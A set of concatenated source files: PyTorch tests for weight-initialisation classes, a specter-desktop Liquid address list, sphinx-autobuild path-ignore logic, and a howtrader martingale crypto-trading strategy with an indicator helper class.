model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = XavierInit(bias=0.1, layer='Conv2d')
func(model)
assert model[0].bias.allclose(torch.full_like(model[2].bias, 0.1))
assert not model[2].bias.allclose(torch.full_like(model[0].bias, 0.1))
constant_func = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
func = XavierInit(gain=100, bias_prob=0.01, layer=['Conv2d', 'Linear'])
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
res = bias_init_with_prob(0.01)
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, res))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = ConstantInit(val=4., bias=5., layer='_ConvNd')
func(model)
assert torch.all(model[0].weight == 4.)
assert torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == 5.)
assert torch.all(model[2].bias == 5.)
func = XavierInit(gain=100, bias_prob=0.01, layer='_ConvNd')
func(model)
assert not torch.all(model[0].weight == 4.)
assert not torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
# test bias input type
with pytest.raises(TypeError):
func = XavierInit(bias='0.1', layer='Conv2d')
    # test layer input type
with pytest.raises(TypeError):
func = XavierInit(bias=0.1, layer=1)
def test_normalinit():
"""test Normalinit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = NormalInit(mean=100, std=1e-5, bias=200, layer=['Conv2d', 'Linear'])
func(model)
assert model[0].weight.allclose(torch.tensor(100.))
assert model[2].weight.allclose(torch.tensor(100.))
assert model[0].bias.allclose(torch.tensor(200.))
assert model[2].bias.allclose(torch.tensor(200.))
func = NormalInit(
mean=300, std=1e-5, bias_prob=0.01, layer=['Conv2d', 'Linear'])
res = bias_init_with_prob(0.01)
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert model[0].bias.allclose(torch.tensor(res))
assert model[2].bias.allclose(torch.tensor(res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = NormalInit(mean=300, std=1e-5, bias_prob=0.01, layer='_ConvNd')
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_truncnormalinit():
"""test TruncNormalInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = TruncNormalInit(
mean=100, std=1e-5, bias=200, a=0, b=200, layer=['Conv2d', 'Linear'])
func(model)
assert model[0].weight.allclose(torch.tensor(100.))
assert model[2].weight.allclose(torch.tensor(100.))
assert model[0].bias.allclose(torch.tensor(200.))
assert model[2].bias.allclose(torch.tensor(200.))
func = TruncNormalInit(
mean=300,
std=1e-5,
a=100,
b=400,
bias_prob=0.01,
layer=['Conv2d', 'Linear'])
res = bias_init_with_prob(0.01)
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert model[0].bias.allclose(torch.tensor(res))
assert model[2].bias.allclose(torch.tensor(res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = TruncNormalInit(
mean=300, std=1e-5, a=100, b=400, bias_prob=0.01, layer='_ConvNd')
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_uniforminit():
""""test UniformInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = UniformInit(a=1, b=1, bias=2, layer=['Conv2d', 'Linear'])
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
func = UniformInit(a=100, b=100, layer=['Conv2d', 'Linear'], bias=10)
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape,
100.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape,
100.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = UniformInit(a=100, b=100, bias_prob=0.01, layer='_ConvNd')
res = bias_init_with_prob(0.01)
func(model)
assert torch.all(model[0].weight == 100.)
assert torch.all(model[2].weight == 100.)
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_kaiminginit():
"""test KaimingInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = KaimingInit(bias=0.1, layer='Conv2d')
func(model)
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.1))
func = KaimingInit(a=100, bias=10, layer=['Conv2d', 'Linear'])
constant_func = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = KaimingInit(bias=0.1, layer='_ConvNd')
func(model)
assert torch.all(model[0].bias == 0.1)
assert torch.all(model[2].bias == 0.1)
func = KaimingInit(a=100, bias=10, layer='_ConvNd')
constant_func = ConstantInit(val=0, bias=0, layer='_ConvNd')
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
def test_caffe2xavierinit():
"""test Caffe2XavierInit."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = Caffe2XavierInit(bias=0.1, layer='Conv2d')
func(model)
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.1))
class FooModule(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(1, 2)
self.conv2d = nn.Conv2d(3, 1, 3)
self.conv2d_2 = nn.Conv2d(3, 2, 3)
def test_pretrainedinit():
"""test PretrainedInit class."""
modelA = FooModule()
constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
modelA.apply(constant_func)
modelB = FooModule()
funcB = PretrainedInit(checkpoint='modelA.pth')
modelC = nn.Linear(1, 2)
funcC = PretrainedInit(checkpoint='modelA.pth', prefix='linear.')
with TemporaryDirectory():
torch.save(modelA.state_dict(), 'modelA.pth')
funcB(modelB)
assert torch.equal(modelB.linear.weight,
torch.full(modelB.linear.weight.shape, 1.))
assert torch.equal(modelB.linear.bias,
torch.full(modelB.linear.bias.shape, 2.))
assert torch.equal(modelB.conv2d.weight,
torch.full(modelB.conv2d.weight.shape, 1.))
assert torch.equal(modelB.conv2d.bias,
torch.full(modelB.conv2d.bias.shape, 2.))
assert torch.equal(modelB.conv2d_2.weight,
torch.full(modelB.conv2d_2.weight.shape, 1.))
assert torch.equal(modelB.conv2d_2.bias,
torch.full(modelB.conv2d_2.bias.shape, 2.))
funcC(modelC)
assert torch.equal(modelC.weight, torch.full(modelC.weight.shape, 1.))
assert torch.equal(modelC.bias, torch.full(modelC.bias.shape, 2.))
def test_initialize():
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
foonet = FooModule()
# test layer key
init_cfg = dict(type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)
initialize(model, init_cfg)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
assert init_cfg == dict(
type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)
# test init_cfg with list type
init_cfg = [
dict(type='Constant', layer='Conv2d', val=1, bias=2),
dict(type='Constant', layer='Linear', val=3, bias=4)
]
initialize(model, init_cfg)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 3.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 4.))
assert init_cfg == [
dict(type='Constant', layer='Conv2d', val=1, bias=2),
dict(type='Constant', layer='Linear', val=3, bias=4)
]
# test layer key and override key
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
initialize(foonet, init_cfg)
assert torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 1.))
assert torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 2.))
assert torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 1.))
assert torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 2.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 3.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 4.))
assert init_cfg == dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
# test override key
init_cfg = dict(
type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))
initialize(foonet, init_cfg)
assert not torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 5.))
assert not torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 6.))
assert not torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 5.))
assert not torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 6.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 5.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 6.))
assert init_cfg == dict(
type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))
init_cfg = dict(
type='Pretrained',
checkpoint='modelA.pth',
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
modelA = FooModule()
constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
modelA.apply(constant_func)
with TemporaryDirectory():
torch.save(modelA.state_dict(), 'modelA.pth')
initialize(foonet, init_cfg)
assert torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 1.))
assert torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 2.))
assert torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 1.))
assert torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 2.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 3.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 4.))
assert init_cfg == dict(
type='Pretrained',
checkpoint='modelA.pth',
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
# test init_cfg type
with pytest.raises(TypeError):
init_cfg = 'init_cfg'
initialize(foonet, init_cfg)
# test override value type
with pytest.raises(TypeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override='conv')
initialize(foonet, init_cfg)
# test override name
with pytest.raises(RuntimeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_3', val=3, bias=4))
initialize(foonet, init_cfg)
# test list override name
with pytest.raises(RuntimeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=[
dict(type='Constant', name='conv2d', val=3, bias=4),
dict(type='Constant', name='conv2d_3', val=5, bias=6)
])
initialize(foonet, init_cfg)
# test override with args except type key
with pytest.raises(ValueError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
override=dict(name='conv2d_2', val=3, bias=4))
initialize(foonet, init_cfg)
# test override without name
with pytest.raises(ValueError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
override=dict(type='Constant', val=3, bias=4))
initialize(foonet, init_cfg)
|
src/cryptoadvance/specter/liquid/addresslist.py | aphex3k/specter-desktop | 683 | 12610439 | <reponame>aphex3k/specter-desktop
from ..addresslist import *
from embit.liquid.addresses import addr_decode, to_unconfidential
class LAddress(Address):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._unconfidential = to_unconfidential(self.address)
@property
def unconfidential(self):
return self._unconfidential or self.address
@property
def is_confidential(self):
return self.address != self.unconfidential
class LAddressList(AddressList):
AddressCls = LAddress
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# scriptpubkey dict for lookups of unconf addresses
self._scripts = {}
self._update_scripts()
def _update_scripts(self):
for addr in list(self.keys()):
sc, _ = addr_decode(addr)
if sc and sc not in self._scripts:
self._scripts[sc] = super().__getitem__(addr)
def add(self, *args, **kwargs):
res = super().add(*args, **kwargs)
# update scriptpubkey dict for lookups of unconf addresses
self._update_scripts()
return res
def __contains__(self, addr):
"""finds address by confidential or unconfidential address by converting to scriptpubkey"""
try: # can fail if addr is "Fee", "Dummy" or hex-scriptpubkey
sc, _ = addr_decode(addr)
if sc and self._scripts.__contains__(sc):
return True
except:
pass
return super().__contains__(addr)
def __getitem__(self, addr):
"""finds address by confidential or unconfidential address by converting to scriptpubkey"""
sc, _ = addr_decode(addr)
if sc in self._scripts:
return self._scripts[sc]
return super().__getitem__(addr)
def get(self, addr, default=None):
try:
return self[addr]
except KeyError:
return default
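# --- Added illustrative sketch (not part of specter) ---
# LAddressList resolves lookups through the scriptpubkey, so a confidential Liquid
# address and its unconfidential form map to the same entry. `conf_addr` is a
# hypothetical placeholder for a confidential address already stored in the list.
def _laddress_lookup_sketch(addr_list: LAddressList, conf_addr: str) -> bool:
    entry = addr_list[conf_addr]             # lookup by the confidential address
    same = addr_list[entry.unconfidential]   # same entry via its unconfidential form
    return entry is same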
|
src/sphinx_autobuild/ignore.py | kianmeng/sphinx-autobuild | 264 | 12610511 | """Logic for ignoring paths."""
import fnmatch
import os
import re
def get_ignore(regular, regex_based):
"""Prepare the function that determines whether a path should be ignored."""
regular_patterns = regular
regex_based_patterns = [re.compile(r) for r in regex_based]
def ignore(path):
"""Determine if path should be ignored."""
# Any regular pattern matches.
for pattern in regular_patterns:
if fnmatch.fnmatch(path, pattern):
return True
if path.startswith(pattern + os.sep):
return True
# Any regular expression matches.
for regex in regex_based_patterns:
if regex.search(path):
return True
return False
return ignore
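# --- Added illustrative sketch ---
# get_ignore() combines fnmatch-style globs with compiled regexes. The patterns
# below are made-up examples, not sphinx-autobuild defaults.
def _ignore_sketch():
    ignore = get_ignore(regular=["_build/*", "venv"], regex_based=[r"\.tmp$"])
    assert ignore("_build/html/index.html")     # glob pattern match
    assert ignore(os.path.join("venv", "bin"))  # path under an ignored directory
    assert ignore("notes.tmp")                  # regular-expression match
    assert not ignore("docs/index.rst")         # not ignored
    return ignore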
|
class_26/strategies/martingle_spot_strategyV3.py | benbenlianghua/51kecheng | 121 | 12610512 | from howtrader.app.cta_strategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData
)
from howtrader.app.cta_strategy.engine import CtaEngine
from howtrader.trader.event import EVENT_TIMER
from howtrader.event import Event
from howtrader.trader.object import Status, Direction, Interval, ContractData, AccountData
from howtrader.app.cta_strategy import BarGenerator
from typing import Optional, Union, Tuple
import numpy as np
import talib
from howtrader.trader.event import EVENT_CONTRACT, EVENT_ACCOUNT
class MyArrayManager(object):
"""
For:
1. time series container of bar data
2. calculating technical indicator value
"""
def __init__(self, size: int = 100):
"""Constructor"""
self.count: int = 0
self.size: int = size
self.inited: bool = False
self.open_array: np.ndarray = np.zeros(size)
self.high_array: np.ndarray = np.zeros(size)
self.low_array: np.ndarray = np.zeros(size)
self.close_array: np.ndarray = np.zeros(size)
self.volume_array: np.ndarray = np.zeros(size)
self.open_interest_array: np.ndarray = np.zeros(size)
def update_bar(self, bar: BarData) -> None:
"""
Update new bar data into array manager.
"""
self.count += 1
if not self.inited and self.count >= self.size:
self.inited = True
self.open_array[:-1] = self.open_array[1:]
self.high_array[:-1] = self.high_array[1:]
self.low_array[:-1] = self.low_array[1:]
self.close_array[:-1] = self.close_array[1:]
self.volume_array[:-1] = self.volume_array[1:]
self.open_interest_array[:-1] = self.open_interest_array[1:]
self.open_array[-1] = bar.open_price
self.high_array[-1] = bar.high_price
self.low_array[-1] = bar.low_price
self.close_array[-1] = bar.close_price
self.volume_array[-1] = bar.volume
self.open_interest_array[-1] = bar.open_interest
@property
def open(self) -> np.ndarray:
"""
Get open price time series.
"""
return self.open_array
@property
def high(self) -> np.ndarray:
"""
Get high price time series.
"""
return self.high_array
@property
def low(self) -> np.ndarray:
"""
Get low price time series.
"""
return self.low_array
@property
def close(self) -> np.ndarray:
"""
Get close price time series.
"""
return self.close_array
@property
def volume(self) -> np.ndarray:
"""
Get trading volume time series.
"""
return self.volume_array
@property
def open_interest(self) -> np.ndarray:
"""
Get trading volume time series.
"""
return self.open_interest_array
def sma(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Simple moving average.
"""
result = talib.SMA(self.close, n)
if array:
return result
return result[-1]
def ema(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Exponential moving average.
"""
result = talib.EMA(self.close, n)
if array:
return result
return result[-1]
def kama(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
KAMA.
"""
result = talib.KAMA(self.close, n)
if array:
return result
return result[-1]
def wma(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
WMA.
"""
result = talib.WMA(self.close, n)
if array:
return result
return result[-1]
def apo(
self,
fast_period: int,
slow_period: int,
matype: int = 0,
array: bool = False
) -> Union[float, np.ndarray]:
"""
APO.
"""
result = talib.APO(self.close, fast_period, slow_period, matype)
if array:
return result
return result[-1]
def cmo(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
CMO.
"""
result = talib.CMO(self.close, n)
if array:
return result
return result[-1]
def mom(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
MOM.
"""
result = talib.MOM(self.close, n)
if array:
return result
return result[-1]
def ppo(
self,
fast_period: int,
slow_period: int,
matype: int = 0,
array: bool = False
) -> Union[float, np.ndarray]:
"""
PPO.
"""
result = talib.PPO(self.close, fast_period, slow_period, matype)
if array:
return result
return result[-1]
def roc(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROC.
"""
result = talib.ROC(self.close, n)
if array:
return result
return result[-1]
def rocr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROCR.
"""
result = talib.ROCR(self.close, n)
if array:
return result
return result[-1]
def rocp(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROCP.
"""
result = talib.ROCP(self.close, n)
if array:
return result
return result[-1]
def rocr_100(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROCR100.
"""
result = talib.ROCR100(self.close, n)
if array:
return result
return result[-1]
def trix(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
TRIX.
"""
result = talib.TRIX(self.close, n)
if array:
return result
return result[-1]
def std(self, n: int, nbdev: int = 1, array: bool = False) -> Union[float, np.ndarray]:
"""
Standard deviation.
"""
result = talib.STDDEV(self.close, n, nbdev)
if array:
return result
return result[-1]
def obv(self, array: bool = False) -> Union[float, np.ndarray]:
"""
OBV.
"""
result = talib.OBV(self.close, self.volume)
if array:
return result
return result[-1]
def cci(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Commodity Channel Index (CCI).
"""
result = talib.CCI(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def atr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Average True Range (ATR).
"""
result = talib.ATR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def natr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
NATR.
"""
result = talib.NATR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def rsi(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Relative Strenght Index (RSI).
"""
result = talib.RSI(self.close, n)
if array:
return result
return result[-1]
def macd(
self,
fast_period: int,
slow_period: int,
signal_period: int,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray, np.ndarray],
Tuple[float, float, float]
]:
"""
MACD.
"""
macd, signal, hist = talib.MACD(
self.close, fast_period, slow_period, signal_period
)
if array:
return macd, signal, hist
return macd[-1], signal[-1], hist[-1]
def adx(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ADX.
"""
result = talib.ADX(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def adxr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ADXR.
"""
result = talib.ADXR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def dx(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
DX.
"""
result = talib.DX(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def minus_di(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
MINUS_DI.
"""
result = talib.MINUS_DI(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def plus_di(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
PLUS_DI.
"""
result = talib.PLUS_DI(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def willr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
WILLR.
"""
result = talib.WILLR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def ultosc(
self,
time_period1: int = 7,
time_period2: int = 14,
time_period3: int = 28,
array: bool = False
) -> Union[float, np.ndarray]:
"""
Ultimate Oscillator.
"""
result = talib.ULTOSC(self.high, self.low, self.close, time_period1, time_period2, time_period3)
if array:
return result
return result[-1]
def trange(self, array: bool = False) -> Union[float, np.ndarray]:
"""
TRANGE.
"""
result = talib.TRANGE(self.high, self.low, self.close)
if array:
return result
return result[-1]
def boll(
self,
n: int,
dev: float,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Bollinger Channel.
"""
mid = self.sma(n, array)
std = self.std(n, 1, array)
up = mid + std * dev
down = mid - std * dev
return up, down
def keltner(
self,
n: int,
dev: float,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Keltner Channel.
"""
mid = self.sma(n, array)
atr = self.atr(n, array)
up = mid + atr * dev
down = mid - atr * dev
return up, down
def donchian(
self, n: int, array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Donchian Channel.
"""
up = talib.MAX(self.high, n)
down = talib.MIN(self.low, n)
if array:
return up, down
return up[-1], down[-1]
def aroon(
self,
n: int,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Aroon indicator.
"""
aroon_down, aroon_up = talib.AROON(self.high, self.low, n)
if array:
return aroon_up, aroon_down
return aroon_up[-1], aroon_down[-1]
def aroonosc(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Aroon Oscillator.
"""
result = talib.AROONOSC(self.high, self.low, n)
if array:
return result
return result[-1]
def minus_dm(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
MINUS_DM.
"""
result = talib.MINUS_DM(self.high, self.low, n)
if array:
return result
return result[-1]
def plus_dm(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
PLUS_DM.
"""
result = talib.PLUS_DM(self.high, self.low, n)
if array:
return result
return result[-1]
def mfi(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Money Flow Index.
"""
result = talib.MFI(self.high, self.low, self.close, self.volume, n)
if array:
return result
return result[-1]
def ad(self, array: bool = False) -> Union[float, np.ndarray]:
"""
AD.
"""
result = talib.AD(self.high, self.low, self.close, self.volume)
if array:
return result
return result[-1]
def adosc(
self,
fast_period: int,
slow_period: int,
array: bool = False
) -> Union[float, np.ndarray]:
"""
ADOSC.
"""
result = talib.ADOSC(self.high, self.low, self.close, self.volume, fast_period, slow_period)
if array:
return result
return result[-1]
def bop(self, array: bool = False) -> Union[float, np.ndarray]:
"""
BOP.
"""
result = talib.BOP(self.open, self.high, self.low, self.close)
if array:
return result
return result[-1]
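# --- Added illustrative sketch (not part of the original file) ---
# MyArrayManager is a rolling window of bars: push bars in with update_bar(), wait
# until `inited` is True, then read indicator values. This helper assumes it is
# called from a strategy's on_bar() with a howtrader BarData instance.
def _array_manager_usage_sketch(am: MyArrayManager, bar: BarData):
    am.update_bar(bar)
    if not am.inited:  # fewer than `size` bars collected so far
        return None
    fast_ma = am.sma(10)
    up, down = am.boll(20, 2.0)  # Bollinger band upper/lower values
    macd, signal, hist = am.macd(12, 26, 9)
    return fast_ma, up, down, macd, signal, hist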
class MartingleSpotStrategyV3(CtaTemplate):
"""
    1. Martingale strategy.
    Binance referral link: https://www.binancezh.pro/cn/futures/ref/51bitquant
    Binance futures referral code: 51bitquant
    ## Strategy idea
    1. Pick a coin whose 1-hour gain exceeds 2.6% or whose 4-hour gain exceeds 4.6%, with an upper wick that is not too long (entry filter), then enter.
    2. Close the position once profit exceeds 1% and price has pulled back 1% from its high; the exact parameters are configurable.
    3. If there is no profit after entry and price keeps falling, add to the position martingale-style each time price drops 5% below the entry price.
"""
author = "51bitquant"
    # Core strategy parameters.
    initial_trading_value = 200  # Value of the initial entry order, in USDT.
    trading_value_multiplier = 2  # Multiplier applied to each additional order.
    max_increase_pos_count = 5  # Maximum number of times to add to the position.
    hour_pump_pct = 0.026  # Required 1-hour price increase.
    four_hour_pump_pct = 0.046  # Required 4-hour price increase.
    high_close_change_pct = 0.03  # high/close - 1, filters out candles with a long upper wick.
    increase_pos_when_dump_pct = 0.05  # Add to the position after a further 5% price drop.
    exit_profit_pct = 0.01  # Take-profit threshold, 1%.
    exit_pull_back_pct = 0.01  # Exit once profit exceeds 1% and price pulls back 1% from its high.
    trading_fee = 0.00075  # Trading fee rate.
    # Variables
    avg_price = 0.0  # Average price of the current position.
    last_entry_price = 0.0  # Price of the most recent entry.
    entry_highest_price = 0.0
    current_pos = 0.0  # Current position size.
    current_increase_pos_count = 0  # Number of entries filled so far.
    total_profit = 0  # Accumulated total profit.
parameters = ["initial_trading_value", "trading_value_multiplier", "max_increase_pos_count",
"hour_pump_pct", "four_hour_pump_pct", "high_close_change_pct", "increase_pos_when_dump_pct",
"exit_profit_pct",
"exit_pull_back_pct", "trading_fee"]
variables = ["avg_price", "last_entry_price", "entry_highest_price", "current_pos", "current_increase_pos_count",
"total_profit"]
def __init__(self, cta_engine: CtaEngine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.last_filled_order: Optional[OrderData, None] = None
self.tick: Optional[TickData, None] = None
self.contract: Optional[ContractData, None] = None
self.account: Optional[AccountData, None] = None
self.bg_1hour = BarGenerator(self.on_bar, 1, on_window_bar=self.on_1hour_bar, interval=Interval.HOUR) # 1hour
self.bg_4hour = BarGenerator(self.on_bar, 4, on_window_bar=self.on_4hour_bar, interval=Interval.HOUR) # 4hour
        # self.cta_engine.event_engine.register(EVENT_ACCOUNT + 'BINANCE.<coin name>', self.process_account_event)
        # self.cta_engine.event_engine.register(EVENT_ACCOUNT + "BINANCE.USDT", self.process_account_event)
        self.buy_orders = []  # List of active buy order ids.
        self.sell_orders = []  # List of active sell order ids.
        self.min_notional = 11  # Minimum order value (notional) in USDT.
def on_init(self):
"""
Callback when strategy is inited.
"""
self.write_log("策略初始化")
